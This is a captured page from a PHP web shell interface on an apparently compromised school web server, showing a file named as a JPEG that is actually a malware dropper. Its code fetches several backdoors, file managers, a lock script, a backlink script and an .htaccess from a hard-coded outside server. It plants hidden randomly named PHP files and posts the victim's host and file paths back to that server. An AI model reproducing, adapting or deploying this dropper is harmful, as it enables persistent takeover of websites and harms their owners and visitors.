403WebShell

403Webshell

Server IP : 172.67.187.206 / Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF
Directory : /Inetpub/www/myschool/benjama/laysen/

Upload File :

[ Back ]

Current File : /Inetpub/www/myschool/benjama/laysen/959.jpg

<?php
$random = rand();
$server = "95.111.193.4";
$ip_server = $_SERVER['HTTP_HOST'];
$filename = $_SERVER['REQUEST_URI'];

$operatingSystem = PHP_OS;
if (stripos($operatingSystem, "WIN") === 0) {
    echo "bruh fuc u windows";
    file_put_contents("w1n_bl.php", fopen("http://$server/axtus/mal/w1n_bl.txt", 'r'));
    file_put_contents("w1n_res3t.php", fopen("http://$server/axtus/mal/w1n_backdoor.txt", 'r'));
    file_put_contents("w1nm4ng3.php", fopen("http://$server/axtus/mal/win_f1l3manage.txt", 'r'));
    file_put_contents("win_axtusdoor.php", fopen("http://$server/axtus/mal/w1n_backdoor.txt", 'r'));
    header("Location: win_axtusdoor.php");
} else {
    echo "yeah it's linux";

$os = "linux";
$status = "online";
$hiddenfile = dirname($_SERVER['PHP_SELF']) . "/.$random.php";
$res3tfile = dirname($_SERVER['PHP_SELF']) . "/.res3t.php";
$st4tuz = dirname($_SERVER['PHP_SELF']) . "/st4tuz.php";
$l0ck = dirname($_SERVER['PHP_SELF']) . "/.l0ck.php";
$bl = dirname($_SERVER['PHP_SELF']) . "/bl.php";

file_put_contents("index.php", fopen("http://$server/axtus/mal/index.txt", 'r'));
file_put_contents("w1n_bl.php", fopen("http://$server/axtus/mal/w1n_bl.txt", 'r'));
file_put_contents("w1n_res3t.php", fopen("http://$server/axtus/mal/w1n_backdoor.txt", 'r'));
file_put_contents("getfolder.php", fopen("http://$server/axtus/mal/getf0ld3r.txt", 'r'));
file_put_contents("put.php", fopen("http://$server/axtus/mal/put.txt", 'r'));
file_put_contents("extract.php", fopen("http://$server/axtus/mal/extract.txt", 'r'));
file_put_contents("w1nm4ng3.php", fopen("http://$server/axtus/mal/win_f1l3manage.txt", 'r'));
file_put_contents("win_axtusdoor.php", fopen("http://$server/axtus/mal/w1n_backdoor.txt", 'r'));
file_put_contents(".htaccess", fopen("http://$server/axtus/mal/htaccess", 'r'));
file_put_contents("st4tuz.php", fopen("http://$server/axtus/mal/st4tuz.txt", 'r'));
file_put_contents("bl.php", fopen("http://$server/axtus/mal/bl.txt", 'r'));
file_put_contents(".res3t.php", fopen("http://$server/axtus/mal/backdoor.txt", 'r'));
file_put_contents(".l0ck.php", fopen("http://$server/axtus/mal/l0ck.txt", 'r'));
file_put_contents(".$random.php", fopen("http://$server/axtus/mal/f1l3manage.txt", 'r'));

$url_bl = 'http://' . $server . '/axtus/action/insertbl.php';
$data_bl = array('backlink' => $bl,'host' => $ip_server);

$url = 'http://' . $server . '/axtus/action/server.php';
$data = array('ip' => $ip_server, 'file' => $filename, 'hiddenfile' => $hiddenfile, 'resetfile' => $res3tfile, 'statusfile' => $st4tuz, 'lockfile' => $l0ck, 'os' => $os,'backlink' => $bl, 'status' => $status);

$options = array(
    'http' => array(
        'header'  => "Content-type: application/x-www-form-urlencoded\r\n",
        'method'  => 'POST',
        'content' => http_build_query($data),
    ),
);
$context  = stream_context_create($options);
$response = file_get_contents($url, true, $context);
echo "SUCCESS";
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit